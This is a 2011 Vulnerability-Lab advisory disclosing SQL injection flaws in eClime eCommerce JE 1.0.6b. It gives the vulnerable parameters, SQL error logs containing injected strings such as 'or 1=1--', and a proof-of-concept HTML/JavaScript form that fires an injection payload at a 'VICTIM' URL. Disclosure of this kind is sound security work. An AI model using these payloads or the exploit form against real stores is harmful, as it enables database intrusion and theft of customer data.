Lucene search
Vulnerability Research LaboratoryVULNERLAB:82HistoryJul 13, 2011 - 12:00 a.m.
eClime eCommerce JE 1.0.6b - SQL Injection Vulnerabilities
2011-07-1300:00:00
Vulnerability Research Laboratory
www.vulnerability-lab.com
36
Document Title:
===============
eClime eCommerce JE 1.0.6b - SQL Injection Vulnerabilities
Release Date:
=============
2011-07-13
Vulnerability Laboratory ID (VL-ID):
====================================
82
Product & Service Introduction:
===============================
eclime is a very powerful Smartyβ’ based e-commerce/shopping cart software build from trusted osCommerce 2.2 engine,
with many useful contributions added. It has all the features needed to run a successful internet store and can
be customized to whatever configuration you need.
* Secure and stable code base
* Secure transactions with SSL
* Lightning FAST! - Under 28 Queries per full products list page!
* 100% Smarty(TM)
* 100% Valid Strict XHTML
* All orders stored in the database for fast and efficient retrieval
* Customers can view their order history and order statuses
* Customers can maintain their accounts (multiple shipping and billing addresses)
* Temporary shopping cart for guests and permanent shopping cart for customers
* Product reviews with advanced customizable spam filtering features
* Foreseen checkout procedure
* Global and per-category bestseller lists
* Display what other customers have ordered with the current product shown
* Breadcrumb trail for easy site navigation
* Forgot password (confirmation key feature)
* 100% Dynamic plugin based layout.
* Available plugins:
* Quick search \"auto-complete\" (with results count) and advanced search
* Products auto-stretch (\'x\' number of products per row depending on the size of the window)
* Dynamic product attributes relationship with attribute images
* HTML based product descriptions
* Image auto-thumbnails (with caching functionality)
* Advanced watermarking system
* Products extra images
* Multiple language support
* Web based admin Panel
* View all products page
* Wishlist
* RSS feed - new products, product specials.
Admin panel:
* Secure and stable code base
* Admin with access levels
* Drag & drop plugin manager
* Down for maintenance
* Google site maps
* Sales/tax reporting
* Products/categories:
o Unlimited products and categories
o Unlimited products specials
o Unlimited products accessories
o Unlimited products extra images
o Drag & drop products/categories sorting (custom sorting)
o Predefined products sorting (random, date, price, name)
o Inactivate/activate categories/products
o Virtual products
o Categories descriptions
* Unlimited static content pages
* Article/page manager
* Multiple language support
* Coupon manager
* Payment Modules Included:
o Google Checkout
o PayPal Express Checkout
o PayPal Direct Checkout
o Authorize.Net Consolidated Credit Card v1.7
o osCommerce core Paypal IPN v1.1
o Linkpoint
o Cash on Delivery
o Standard osC Credit Card
o EFS Net
o GeoTrust QuickPayments
o iPayment
o Check/Money order
o NOCHEX
o PayBox Credit Card
o 2CheckOut
o PSIGate
o SECPay
* Shipping Modules Included:
* Edit orders
* WYSIWYG FCKeditor (supports IE, Firefox, Mozilla, Netscape)
(Copy of Vendor Homepage: http://www.eclime.com/)
Abstract Advisory Information:
==============================
Vulnerability-Lab discovered multiple SQL-Injection Vulnerabilities in the E-Commerce Jet Engine.
Vulnerability Disclosure Timeline:
==================================
2011-00-00: Vendor Notification
2011-00-00: Vendor Response/Feedback
2011-00-00: Vendor Fix/Patch
2011-00-00: Public or Non-Public Disclosure
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple SQL vulnerabilities are detected in eclime ecommerce jet engine.
The vulnerability allows an remote attacker to inject own sql statements on a vulnerable application parameter request.
Vulnerable Module(s):
[+] manufacturers_id
--- SQL Error Logs ---
Example Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near -1 at line 1 SELECT count(p.products_id) as total FROM products_description pd, products p
LEFT JOIN manufacturers m ON p.manufacturers_id = m.manufacturers_id LEFT JOIN specials s ON (p.products_id = s.products_id AND
s.customers_group_id = \/0\/), products_to_categories p2c WHERE p.products_status = /1/ AND p.manufacturers_id = m.manufacturers_id
AND m.manufacturers_id = /
Vulnerable Module:
[+] Login Form
--- SQL Error Logs ---
Example Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near \ \ at line 5 SELECT attempt_count FROM login_attempts WHERE ip_address = \ xx.137.23.137\ AND user_name =
\ -1# \ \ AND password = \ -!#\
1136 - Column count doesn\ t match value count at row 1
INSERT INTO `login_attempts` ( `ip_address`, `user_name`, `password`, `attempt_count`, `time_stamp` ) VALUES
( \ xx.137.23.137\ , \ \ or 1=1--\ , \ \ or 1=1--\ , 1, \ 1256536215\ )
Pictures:
../sql1.png
../sql2.png
../sql3.png
Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ...
Path: ../eclime/
File: manufacturers.php
Para: ?manufacturers_id=
Path: ../eclime/
File: login.php
Example URL:
http://xxx.com/eclime/manufacturers.php?manufacturers_id=[SQL-Injection]
http://xxx.com/eclime/login.php[SQL-Injection]
<html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>eClime - E-Commerce Jet Engine 1.0.6b [Remote SQL-Injection]</title>
<script language="JavaScript">
var path="/eclime/"
var file="manufacturers.php"
var para ="?manufacturers_id="
var sql = "-1%27%20order%20by%201,2,3,4,5****"
function command(){
if (document.rfi.target1.value==""){
alert("Failed..");
return false;
}
rfi.action= document.rfi.target1.value+path+file+para+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// eClime - E-Commerce Jet Engine 1.0.6b [Remote SQL-Injection]
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// ~Rem0ve ... mittagspause :P
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
</script></head><body bgcolor="#000000" link="#990000">
<center><p align="center"><b><font face="Verdana" size="2" color="#006633">eClime - E-Commerce Jet Engine [SQL-Injection Exploit]</font></b></p>
<form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left"><p><b><font face="Arial" size="2" color="#006633">
VICTIM:</font></b><input name="target1" type="text" style="background-color: #006633" onMouseOver="javascript:this.style.background=
'#808080';" onMouseOut="javascript:this.style.background='#808000';" value="http://" size="53">
<b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080"> http://www.vulnerability-lab.com</font></b></p>
</div><p align="left"><input type="submit" value="Execute INPUT" name="B1"><input type="reset" value="Clear ALL" name="B2"></p></form><p><br>
<iframe name="getting" height="337" width="1000" scrolling="yes" frameborder="0"></iframe></p><div align="left"> <p align="center"><b>
<font face="Verdana" size="2" color="#008000">Vulnerability Lab <a href="http://www.vulnerability-lab.com">~Remove</a>
</font></b></p></div></center></body></html>
Security Risk:
==============
The security risk of the sql injection vulnerabilities are estimated as critical.
Credits & Authors:
==================
Vulnerability Research Laboratory
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright Β© 2012 | Vulnerability Laboratory